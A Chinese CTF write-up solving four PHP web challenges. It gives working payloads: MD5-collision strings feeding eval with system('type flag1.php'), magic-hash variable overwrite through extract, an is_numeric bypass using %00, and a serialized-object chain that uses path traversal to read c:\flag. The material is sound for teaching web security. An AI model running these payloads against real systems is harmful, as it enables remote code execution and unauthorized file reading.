windows环境下部署代码
WEB1:
<?php
error_reporting(0);
if(isset($_GET['x'])&&isset($_GET['y']) && strpos($_GET['x'], 'system("type flag1.php");') !== false && strpos($_GET['y'], 'system("type flag1.php");') !== false){
$x=$_GET['x'];
$y=$_GET['y'];
if((string)$x!=(string)$y&&md5($x)===md5($y)){
eval($x.$y);
}else{
die("---------------------------flag在当前目录下的flag1.php文件中-----------------------------------");
}
}else{
highlight_file(__FILE__);
}
使用md5碰撞产生相等的值。
这里使用了工具fastcoll。下载的地址:https://github.com/iamjazz/Md5collision
1.首先新建1.txt文档,内容:system("type flag1.php");?>//
2.然后执行 fastcoll_v1.0.0.5.exe -p init.txt -o 1.txt 2.txt
此时会在目录下生成1.txt和2.txt。
接着命令窗口运行 php Md5collision.php 会生成两段url编码
x和y分别传值就可以了
x=system%28%22type+flag1.php%22%29%3B%3F%3E%2F%2F%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%DE%D9Z%96%AA%B7k%98%C2%DB%9C%7BQC%06%11%2A%29N%01%81%12%9E%A02%AAyfl%A4%964%1F%E2%AC%CA%D9%2B8%A0%EBK%D0%DB%91%0FA%FC%D94%B7nS%A0%14.%0Fb%E4cjl%EEah%D4D%EDK%03%88%9BU%8A%E3%28%1D%08S%2F%96%9F%1AU%F5%85%0E%A6%D1Z%EEM%EC%86%FE%F1%18%1D%26%DA%F6%CC%E7%3E%9A%82I7%CA%94%E6%AEh%BE%9B%90%5D%9A%3D%A9%16W%B7%27Ry%1B%F0&y=system%28%22type+flag1.php%22%29%3B%3F%3E%2F%2F%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%DE%D9Z%96%AA%B7k%98%C2%DB%9C%7BQC%06%11%2A%29N%81%81%12%9E%A02%AAyfl%A4%964%1F%E2%AC%CA%D9%2B8%A0%EBK%D0%DB%91%8FA%FC%D94%B7nS%A0%14.%0Fb%E4%E3jl%EEah%D4D%EDK%03%88%9BU%8A%E3%28%1D%08S%2F%96%9F%1A%D5%F5%85%0E%A6%D1Z%EEM%EC%86%FE%F1%18%1D%26%DA%F6%CC%E7%3E%9A%82I7%CA%14%E6%AEh%BE%9B%90%5D%9A%3D%A9%16W%B7%A7Ry%1B%F0
WEB5:
<?php
highlight_file('5blfg.php');
include('f' . 'lag5' . '.php');
$var = "y" . "cfl" . "ag";
$$var = str_replace('N', 'Z', 'Not the reaN flag');
$content = trim(@file_get_contents('fl' . 'a' . 'g5' . '.php'));
extract($_GET);
if (isset($$var)) {
if ($$var != $content && md5($$var) == md5($content)) {
echo "</br>";
echo "$flag";
} else {
echo "</br>";
echo 'please ' . 'refuel';
}
}
?>
$$var=$ycflag,$content经过extract($_GET);后也会变量覆盖
传变量值ycflag,content,使md5弱等于就行
?ycflag=QNKCDZO&content=TUFEPMC
WEB4:
<?php
highlight_file('4kbzf.php');
include('f' . 'lag4' . '.php');
$info = "";
$req = [];
$flag = trim(@file_get_contents('fl' . 'a' . 'g4' . '.php'));
ini_set("display_error", false);
error_reporting(0);
if(!isset($_GET['number'])){
header("hint:" . hash("md5", "2djwioadopkwapodkpawkpdw.txt"));
die("please refuel!!");
}
foreach([$_GET, $_POST] as $global_var) {
foreach($global_var as $key => $value) {
$value = trim($value);
if(is_string($value)){
$req[$key] = addslashes($value);
}
}
}
function is_hwhs_number($number) {
$number = strval($number);
$i = 0;
$j = strlen($number) - 1;
while($i < $j) {
if($number[$i] !== $number[$j]) {
return false;
}
$i++;
$j--;
}
return true;
}
if(is_numeric($_REQUEST['number'])) {
$info="抱歉您输入的是数字";
}
elseif($req['number']!=strval(intval($req['number']))) {
$info = "数字必须等于其整数!!";
}
else {
$value1 = intval($req["number"]);
$value2 = intval(strrev($req["number"]));
if($value1!=$value2=323){
$info="这不是回文数字!!";
}
else {
if(is_hwhs_number($req["number"])){
$info = "{$value1} 是一个回文数字!";
}
else {
var_dump($flag);
}
}
}
?>
is_numeric()、intval()函数检查传入的number变量是否是数字,is_numeric()使用%00绕过,放在开头绕过,但是经我测试,放在结尾也行
%00是绕过is_numeric(),323是回文数,%0c是\f,%2b是+,加入\f和+是为了在判断$req['number']!=strval(intval($req['number']))之后绕过is_hwhs_number()
传值:?number=%00%2b323
参考文章:关于PHP一些漏洞的姿势_末初的技术博客_51CTO博客
WEB6:
<?php
// ini_set("display_errors", 0);
// error_reporting(0);
class Yangqidasai
{
protected $string1;
protected $string2;
function __destruct()
{
if(($this->string1 != $this->string2) && (md5($this->string1) === md5($this->string2)))
{
$filename = "C:\\web\\www\\html\\".$this->string1;
$filename = substr($filename, 0, 47);
$char_arr = array_count_values(str_split($filename));
arsort($char_arr);
$char_arr = array_keys($char_arr);
do
{
$char = array_shift($char_arr);
}
while($char == "t");
$filename = $filename.$char;
$newfilename1 = str_replace("../", "..\\", $filename);
echo '<hr>';
$newString = substr($newfilename1, 0, strlen($newfilename1) - 7);
echo file_get_contents($newString);
}
}
}
highlight_file(__FILE__);
echo 'flag in c:\\flag';
unserialize($_REQUEST['xyctf']);
?>
1、分析代码,string1要传递的值应该为
../../../../../../../flagaaaaaa
经过代码对string1的值进行截取、替换和拼接一系列操作,$newString最终的值为 :C:\web\www\html\..\..\..\..\..\..\..\flag
file_get_contents才能以目录穿越的方式读到c:\flag文件
2、以web1的方式绕过md5强等
新建 一个文件内容为“../../../../../../../flagaaaaaa”的x.txt文件
执行 fastcoll_v1.0.0.5.exe -p x.txt -o 1.txt 2.txt
php Md5collision.php 生成两段md3强等的字符作为stirng1和string2的值
3、生成反序列化字符
<?php
class Yangqidasai
{
protected $string1;
protected $string2;
function __construct() {
$this->string1 = urldecode('..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflagaaaaaa%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%E8%CAT%02O%E0mO%5CU66-%D4%A4%7ClC%D2h%12%18%99%92%5D%8A%83%CD%86%944%AB%FF%14%A3%EA%5Ej%3A%BD%CB%E5j%1C%CA%1F%A4%3A%99%9F%16%FC%26%EC%9Eh%14%A7jc%ABR%09%C5o%25t%BF6%B1q%F7%81%8C%1Dd%D4%21%22%1B%1D%E5%C3%27%5C%DA%818%0B%B5%F0%EE%2B%60H%D6%D3%8BH%14%A7%05+%1E6%09FSQ%00%18%23%90%EA%BD%1E%A3%D0%DEz%DC%E9%96%89%230%1E%B9');
$this->string2 = urldecode('..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflagaaaaaa%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%E8%CAT%02O%E0mO%5CU66-%D4%A4%7ClC%D2%E8%12%18%99%92%5D%8A%83%CD%86%944%AB%FF%14%A3%EA%5Ej%3A%BD%CB%E5j%1C%CA%9F%A4%3A%99%9F%16%FC%26%EC%9Eh%14%A7j%E3%ABR%09%C5o%25t%BF6%B1q%F7%81%8C%1Dd%D4%21%22%1B%1D%E5%C3%A7%5C%DA%818%0B%B5%F0%EE%2B%60H%D6%D3%8BH%14%A7%05+%1E6%09FSQ%80%17%23%90%EA%BD%1E%A3%D0%DEz%DC%E9%96%09%230%1E%B9');
}
}
$b=new Yangqidasai;
echo urlencode(serialize($b));
?>
?xyctf=O%3A11%3A%22Yangqidasai%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00string1%22%3Bs%3A192%3A%22..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflagaaaaaa%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%E8%CAT%02O%E0mO%5CU66-%D4%A4%7ClC%D2h%12%18%99%92%5D%8A%83%CD%86%944%AB%FF%14%A3%EA%5Ej%3A%BD%CB%E5j%1C%CA%1F%A4%3A%99%9F%16%FC%26%EC%9Eh%14%A7jc%ABR%09%C5o%25t%BF6%B1q%F7%81%8C%1Dd%D4%21%22%1B%1D%E5%C3%27%5C%DA%818%0B%B5%F0%EE%2B%60H%D6%D3%8BH%14%A7%05+%1E6%09FSQ%00%18%23%90%EA%BD%1E%A3%D0%DEz%DC%E9%96%89%230%1E%B9%22%3Bs%3A10%3A%22%00%2A%00string2%22%3Bs%3A192%3A%22..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflagaaaaaa%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%E8%CAT%02O%E0mO%5CU66-%D4%A4%7ClC%D2%E8%12%18%99%92%5D%8A%83%CD%86%944%AB%FF%14%A3%EA%5Ej%3A%BD%CB%E5j%1C%CA%9F%A4%3A%99%9F%16%FC%26%EC%9Eh%14%A7j%E3%ABR%09%C5o%25t%BF6%B1q%F7%81%8C%1Dd%D4%21%22%1B%1D%E5%C3%A7%5C%DA%818%0B%B5%F0%EE%2B%60H%D6%D3%8BH%14%A7%05+%1E6%09FSQ%80%17%23%90%EA%BD%1E%A3%D0%DEz%DC%E9%96%09%230%1E%B9%22%3B%7D